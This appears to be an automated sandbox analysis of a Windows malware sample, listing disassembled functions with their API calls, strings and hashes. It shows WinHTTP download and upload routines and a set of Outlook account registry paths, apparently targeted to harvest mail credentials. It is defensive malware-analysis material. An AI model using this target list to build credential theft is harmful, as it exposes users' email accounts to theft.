Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prologwsprintf
String ID:
API String ID: 3606448584-0
Opcode ID: e67d30488897add940a01c1c1e874243bf0162f737e6a6f266d518f1238a7958
Instruction ID: 951dca3d5f1a07d3a896ba0750219855a8922a9ceac53cead332dd2a48e4a733
Opcode Fuzzy Hash: e67d30488897add940a01c1c1e874243bf0162f737e6a6f266d518f1238a7958
Instruction Fuzzy Hash: 57220330D04248CFDF01DFE8D9906EEBBB5AF59308F1094AEE445B7252DB744A89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041FD36, Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 404timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041EFFF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032

_strcat.LIBCMT ref: 0041FEA9
_strcat.LIBCMT ref: 0041FF24
SystemTimeToFileTime.KERNEL32(?,000007BC), ref: 00420079
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00420099

Strings

/../, xrefs: 0041FEFA
\../, xrefs: 0041FEE9
\..\, xrefs: 0041FED3
/..\, xrefs: 0041FF0B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileTime$_strcat$LocalPointerSystem
String ID: /../$/..\$\../$\..\
API String ID: 3418985325-3885502717
Opcode ID: e36f6525fcdad91412cec21d8097de7434c186f32a9bb4fca3382da102c0e645
Instruction ID: b00080852119e3309c6e69affa03d4f88f3d8ac799483f1e808ff3a2e1d6d61c
Opcode Fuzzy Hash: e36f6525fcdad91412cec21d8097de7434c186f32a9bb4fca3382da102c0e645
Instruction Fuzzy Hash: 01E1E2715087418BD315CF29C4806E7BBE0AF89314F548A2FE4A9C7342D779D98ACB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004373C6, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 349registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004373CB
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?), ref: 0043746F
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?), ref: 004374BD
RegCloseKey.ADVAPI32(?,?,?), ref: 004374C6

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

Y+6, xrefs: 0043747B
wEGGOW%E, xrefs: 0043773C

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseDeallocateH_prologOpenQueryValue
String ID: Y+6$wEGGOW%E
API String ID: 2130659939-258343349
Opcode ID: e8994eb3b9e7bea9d06e714286d018bfbf6a0369ca8fe2a82bc70e15de0dfb26
Instruction ID: 479214f8d44ea07ff9a1ad6becd9a1226b0edc878cb2a4cc9ae60e24f50ce448
Opcode Fuzzy Hash: e8994eb3b9e7bea9d06e714286d018bfbf6a0369ca8fe2a82bc70e15de0dfb26
Instruction Fuzzy Hash: D1D118B0D042489EDF25CFA9C8857EEBBB8AF19304F10415FE496B7282D7785648CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004371FA, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004371FF
GetTimeZoneInformation.KERNEL32(?,74B624D0,00000000), ref: 0043721C

Part of subcall function 00412BD9: __EH_prolog.LIBCMT ref: 00412BDE

Part of subcall function 00413337: __EH_prolog.LIBCMT ref: 0041333C
Part of subcall function 00413337: std::locale::_Init.LIBCPMT ref: 0041335A

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0043736A

Strings

9}<)g}, xrefs: 00437267, 004372AB, 0043726E
%A, xrefs: 004372BC
T, xrefs: 0043731F

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$InformationInitIos_base_dtorTimeZonestd::ios_base::_std::locale::_
String ID: 9}<)g}$T$%A
API String ID: 3259846166-174459869
Opcode ID: b3778d1821aca3890c57e4e293b17e6e05bbe9bc7304a9f8076132ac10da8c0c
Instruction ID: 162ebed1eb13c3b0278badf9aa4dc64885cc43935c5698f0d3ef241c67cc4b1f
Opcode Fuzzy Hash: b3778d1821aca3890c57e4e293b17e6e05bbe9bc7304a9f8076132ac10da8c0c
Instruction Fuzzy Hash: 3A418F71C04358CBDB15DFA9C944BEEBBB5AF49308F1081AED809B7241EB781A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00410648, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 611libraryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041064D

Part of subcall function 00411E16: __EH_prolog.LIBCMT ref: 00411E1B

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

LoadLibraryA.KERNEL32(00000000,?), ref: 00410699
SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004106F5

Part of subcall function 0040BB39: __EH_prolog.LIBCMT ref: 0040BB3E
Part of subcall function 0040BB39: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BC51
Part of subcall function 0040BB39: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0040BC58

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

FreeLibrary.KERNEL32(00000000), ref: 00410E60

Strings

Opera, xrefs: 00410779

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$FreeHeapLibrary$DeallocateEnvironmentFolderLoadPathProcessSpecialVariable_strcat
String ID: Opera
API String ID: 1239964785-505338728
Opcode ID: edecc0e9115195082c133874438130f62ac5f99104b5bfb48e235dd940d06894
Instruction ID: ac1ca881525ca60fb4c11f72a3a0c97497af74f9ee91cf4d6f14cdaa43dc21d9
Opcode Fuzzy Hash: edecc0e9115195082c133874438130f62ac5f99104b5bfb48e235dd940d06894
Instruction Fuzzy Hash: D8427D70D00258DFDF14DFA9C9457EEBBB1AF49308F1080AEE445B7281DB789A85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042A224, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0046DB80,00000000,00000015,0046DBA0,?), ref: 0042A244
StrStrIW.SHLWAPI(?,0047C394), ref: 0042A295
CoTaskMemFree.OLE32(?), ref: 0042A2B3
CoTaskMemFree.OLE32(?), ref: 0042A2C1

Strings

(, xrefs: 0042A279

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeTask$CreateInstance
String ID: (
API String ID: 2903366249-3887548279
Opcode ID: ce4cd7f7648d056d8e8a876ce9c7a0421bd9f5a584195d27b53de379391fd91c
Instruction ID: 49c26595c2effa2261d274fccedc07f4d445ec10e3301bf20fc288ebb5b5a36d
Opcode Fuzzy Hash: ce4cd7f7648d056d8e8a876ce9c7a0421bd9f5a584195d27b53de379391fd91c
Instruction Fuzzy Hash: 7021F974F00219EFDB04DFA5E884D9EB7B9EF48704B5480AAE805E7250DB75AD44CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF59, Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 959memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040BF5E

Part of subcall function 0040AF03: __EH_prolog.LIBCMT ref: 0040AF08

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000030,00000012,0040CF41,?,?), ref: 0040CBE4
HeapFree.KERNEL32(00000000,?,?,?,?,00000030,00000012,0040CF41,?,?,?,?,?,?,?,?), ref: 0040CBEB

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

+, xrefs: 0040CED0

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prologHeap$FreeProcess
String ID: +
API String ID: 2705843071-2126386893
Opcode ID: 2d538c1b0e30c72e98c484eec62a8657bd5a1e9e8a44bd9ae100a588f7064717
Instruction ID: 6f650102c44ed2988148468859b7f00f5fc0931f42b68e76572e5eacd64b4793
Opcode Fuzzy Hash: 2d538c1b0e30c72e98c484eec62a8657bd5a1e9e8a44bd9ae100a588f7064717
Instruction Fuzzy Hash: 50A2D230C042ACCAEB22CB64CD907EDBBB5AF55304F1492EAD48977192DB741BC9CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0043EFDD, Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(000000FF,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000,0041444D,?), ref: 0043EFE9
FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D), ref: 0043F019
GetLastError.KERNEL32(?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000), ref: 0043F026
FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D), ref: 0043F040
GetLastError.KERNEL32(?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000), ref: 0043F04D

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$ErrorFileFirstLast$Close
String ID:
API String ID: 569926201-0
Opcode ID: fada70a15832c657e719280ac0e73911267d73067d67439a8aaead182a17a262
Instruction ID: 2e699ab520b179d43ad2bf4343934b09a901ed4888842c9946054f0494e0c7a6
Opcode Fuzzy Hash: fada70a15832c657e719280ac0e73911267d73067d67439a8aaead182a17a262
Instruction Fuzzy Hash: 3601B531900189BBCB301F66DC0CC5B3F79EFCA721F10453AF668851E1D7B19851DA69

Uniqueness

Uniqueness Score: -1.00%

Function 00446C01, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00457287,?,00446C00,00000000,?,00457287,00000000,00457287), ref: 00446C23
TerminateProcess.KERNEL32(00000000,?,00446C00,00000000,?,00457287,00000000,00457287), ref: 00446C2A
ExitProcess.KERNEL32 ref: 00446C3C

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fd567d1d95fc0b1b2e0ab47bf8cb84df5a4e2946a63e4a6b2f4b1354005d26f9
Instruction ID: 83c662bb3abd2437a7950714daeb2dd464c2df181d476724e7f7802d14e6ca57
Opcode Fuzzy Hash: fd567d1d95fc0b1b2e0ab47bf8cb84df5a4e2946a63e4a6b2f4b1354005d26f9
Instruction Fuzzy Hash: 5CE08631910108AFCF116F55CD499493B69FF41341F014029F80486131DB79DDC2CB8F

Uniqueness

Uniqueness Score: -1.00%

Function 004344AA, Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 276fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004344AF
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00488780,0000000F,00000001), ref: 004344ED
CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00434511
WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 004345DF

Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC

WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 00434639
WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00800100,?), ref: 004346B1
WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00000100,?), ref: 00434718
WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00434748
WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00434754
WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 00434769
WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 00434794
WriteFile.KERNEL32(?,00000000,?,CECED245,00000000), ref: 004347A9
GetLastError.KERNEL32 ref: 004347C4
WinHttpCloseHandle.WINHTTP(00000000), ref: 004347CB
WinHttpCloseHandle.WINHTTP(00000000), ref: 004347D5
CloseHandle.KERNEL32(?,00000001,00000000,00000002,00000080,00000000), ref: 004347DE
WinHttpCloseHandle.WINHTTP(?), ref: 004347E5

Strings

%99[^:]://%99[^/]%99[^], xrefs: 00434537
GET, xrefs: 004346AB, 00434712

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Http$CloseHandle$OpenRequest$ByteCharConnectDataFileMultiWide$AvailableCreateErrorH_prologLastQueryReadReceiveResponseSendWrite
String ID: %99[^:]://%99[^/]%99[^]$GET
API String ID: 4006077129-3478069819
Opcode ID: 7731d4a677624138adea306bb89b52b35c4f93b52ec06982b5d9bcd5e6027f7a
Instruction ID: 7f1348a21265612ae21412d4864c76256cf8e41bc4be0fb22147dbfb47b544d7
Opcode Fuzzy Hash: 7731d4a677624138adea306bb89b52b35c4f93b52ec06982b5d9bcd5e6027f7a
Instruction Fuzzy Hash: 2AA17F71D00259AFDB11DFA0CD85BEEB7B8FF49304F1040AAE405A7241EB789E45CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004340AE, Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 304COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004340B3
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0047935B,00000000), ref: 00434101
WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,?,?,?,0047935B,00000000), ref: 004341D0

Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC

WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,?,?,?,0047935B,00000000), ref: 0043422D
WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?,?,?,?,0047935B,00000000), ref: 004342AF
WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?,?,?,?,0047935B,00000000), ref: 00434320
_strlen.LIBCMT ref: 0043434D
_strlen.LIBCMT ref: 00434357
WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,?,?,0047935B,00000000), ref: 0043436D
WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,0047935B,00000000), ref: 0043437E
WinHttpQueryDataAvailable.WINHTTP(00000000,00000000,?,?,?,0047935B,00000000), ref: 00434395
WinHttpReadData.WINHTTP(00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047935B,00000000), ref: 004343C0
GetLastError.KERNEL32(?,?,?,0047935B,00000000), ref: 00434478
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047935B,00000000), ref: 00434482
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047935B,00000000), ref: 00434489
WinHttpCloseHandle.WINHTTP(?,?,?,?,0047935B,00000000), ref: 00434493

Strings

Content-Type: text/plain; charset=UTF-8, xrefs: 00434367
%99[^:]://%99[^/]%99[^], xrefs: 00434127

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Http$CloseHandleOpenRequest$ByteCharConnectDataMultiWide_strlen$AvailableErrorH_prologLastQueryReadReceiveResponseSend
String ID: %99[^:]://%99[^/]%99[^]$Content-Type: text/plain; charset=UTF-8
API String ID: 1550182571-3818427525
Opcode ID: 37bb36c9e47222895413c67faafc5f2c053d83bd56cecd304482171d42c377a6
Instruction ID: f6a42a86f5f42bcb76b4ddb13d4285eca02b7aca3b6ba09dba9197e53e9a81a6
Opcode Fuzzy Hash: 37bb36c9e47222895413c67faafc5f2c053d83bd56cecd304482171d42c377a6
Instruction Fuzzy Hash: E1C17E70D012199FDB14DFA5C985BEEBBB8EF09304F1040AEE805A7251DB789A84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00435346, Relevance: 28.6, APIs: 3, Strings: 16, Instructions: 102stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004349A2: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 004349E3
Part of subcall function 004349A2: GetProcAddress.KERNEL32(00000000,?), ref: 00434A20
Part of subcall function 004349A2: FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 00434A54

Part of subcall function 00434E00: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E25
Part of subcall function 00434E00: RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00435370,00000001), ref: 00434EB6
Part of subcall function 00434E00: RegCloseKey.ADVAPI32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434EC3

Part of subcall function 00434ECD: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434EF4
Part of subcall function 00434ECD: RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434F1F
Part of subcall function 00434ECD: lstrlenW.KERNEL32(0043549A,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F36
Part of subcall function 00434ECD: lstrlenW.KERNEL32(?,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F43
Part of subcall function 00434ECD: lstrcpyW.KERNEL32 ref: 00434F64
Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434F70
Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,?), ref: 00434F7E
Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,?), ref: 00434F8A
Part of subcall function 00434ECD: RegEnumKeyExW.ADVAPI32(0043549A,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434FC4
Part of subcall function 00434ECD: RegCloseKey.ADVAPI32(0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434FD9

Part of subcall function 0043592B: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
Part of subcall function 0043592B: RegCloseKey.ADVAPI32(00000100), ref: 004359EE

lstrlenW.KERNEL32(00000000,?,?,?,0043549A), ref: 004353A8
lstrcpyW.KERNEL32 ref: 004353C0
lstrcpyW.KERNEL32 ref: 004353CC

Part of subcall function 00434E00: lstrlenW.KERNEL32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E4B
Part of subcall function 00434E00: lstrcpyW.KERNEL32 ref: 00434E68
Part of subcall function 00434E00: lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434E74
Part of subcall function 00434E00: lstrcatW.KERNEL32(00000000,?), ref: 00434E82

Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68

Strings

\Accounts, xrefs: 004353C6
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook, xrefs: 0043540A
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings, xrefs: 004353FF
Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook, xrefs: 00435426
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 004353ED
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook, xrefs: 00435450
Identities, xrefs: 0043537A
Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook, xrefs: 00435472
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook, xrefs: 00435442
\Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00435370
Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook, xrefs: 0043545E
Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook, xrefs: 00435434
Software\Microsoft\Internet Account Manager, xrefs: 0043538E
Outlook, xrefs: 00435389
Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook, xrefs: 00435418
Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00435364

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
String ID: Identities$Outlook$Software\Microsoft\Internet Account Manager$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook$\Accounts$\Software\Microsoft\Internet Account Manager\Accounts
API String ID: 527226083-92925148
Opcode ID: 4f467f346dbf1ee6fe101150daef03d5d27cf591a87cd6da9a66bbec358481ae
Instruction ID: 0d555bd477462e5ae5348e1b232b1991ce146c984576671113c76f2dd29a40c2
Opcode Fuzzy Hash: 4f467f346dbf1ee6fe101150daef03d5d27cf591a87cd6da9a66bbec358481ae
Instruction Fuzzy Hash: 27310BB1950208BED704EBE6DDD3DEE73ACEF58748F60545FF00521182ABBD2E059629

Uniqueness

Uniqueness Score: -1.00%

Function 004641EE, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 00463EA7: CreateFileW.KERNEL32(00000000,00000000,?,00464297,?,?,00000000,?,00464297,00000000,0000000C), ref: 00463EC4

GetLastError.KERNEL32 ref: 00464302
__dosmaperr.LIBCMT ref: 00464309
GetFileType.KERNEL32(00000000), ref: 00464315
GetLastError.KERNEL32 ref: 0046431F
__dosmaperr.LIBCMT ref: 00464328
CloseHandle.KERNEL32(00000000), ref: 00464348
CloseHandle.KERNEL32(0045A93D), ref: 00464495
GetLastError.KERNEL32 ref: 004644C7
__dosmaperr.LIBCMT ref: 004644CE

Strings

H, xrefs: 00464453

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ae2176c8292bafb7d73a904bbf193ddb6ba473326339fa5daf4097211ca1d489
Instruction ID: 4268d31200a389006fd8fd956af786bf09120caabc753a0eab52de2409f61829
Opcode Fuzzy Hash: ae2176c8292bafb7d73a904bbf193ddb6ba473326339fa5daf4097211ca1d489
Instruction Fuzzy Hash: D5A11632A001549FDF19DF68DC517AE7BE1EF4A324F14015EF811AB392EB398912C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0042032E, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 188filetimeCOMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 004203EC
wsprintfA.USER32 ref: 00420446
wsprintfA.USER32 ref: 00420467
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 00420496
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00420508
SetFileTime.KERNEL32(?,?,?,?), ref: 00420542
CloseHandle.KERNEL32(?), ref: 00420552

Strings

:, xrefs: 00420420
%s%s, xrefs: 00420461
%s%s%s, xrefs: 00420440

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$wsprintf$CloseCreateHandleTimeWrite_strcat
String ID: %s%s$%s%s%s$:
API String ID: 840165387-3034790606
Opcode ID: 8f069e8463c626be3a004baeee745c24c7feb58abd0316c5a27faf6da5075bfd
Instruction ID: e75abde7eae685be2b2f9ab9f80e574431accfd2092442307ffe520205e795b7
Opcode Fuzzy Hash: 8f069e8463c626be3a004baeee745c24c7feb58abd0316c5a27faf6da5075bfd
Instruction Fuzzy Hash: 08615A30700228AFDB20DF14E880BEA77E9AF04354F50446BE98597293D7789EC6CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00438DFD, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
GetLastError.KERNEL32 ref: 00438E3A
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
GlobalFree.KERNEL32 ref: 00438E92

Strings

S-1-5-18, xrefs: 00438E7F

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
String ID: S-1-5-18
API String ID: 857934279-4289277601
Opcode ID: 313d5776834a8a810804749beb3a250ab7b62c37ce036a3a53597f76d94bb189
Instruction ID: 29b2e7db3b3389ff21f5b96232cbe853033b43f37d7ff0144f937ce0bd561e70
Opcode Fuzzy Hash: 313d5776834a8a810804749beb3a250ab7b62c37ce036a3a53597f76d94bb189
Instruction Fuzzy Hash: 94112E35E00214BBDB10ABA2DC09F9FBF78EF49755F104069F605E1060EBB89A05DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00434ECD, Relevance: 15.1, APIs: 10, Instructions: 102stringregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434EF4
RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434F1F
lstrlenW.KERNEL32(0043549A,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F36
lstrlenW.KERNEL32(?,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F43
lstrcpyW.KERNEL32 ref: 00434F64
lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434F70
lstrcatW.KERNEL32(00000000,?), ref: 00434F7E
lstrcatW.KERNEL32(00000000,?), ref: 00434F8A
RegEnumKeyExW.ADVAPI32(0043549A,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434FC4
RegCloseKey.ADVAPI32(0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434FD9

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$Enumlstrlen$CloseOpenlstrcpy
String ID:
API String ID: 3646165539-0
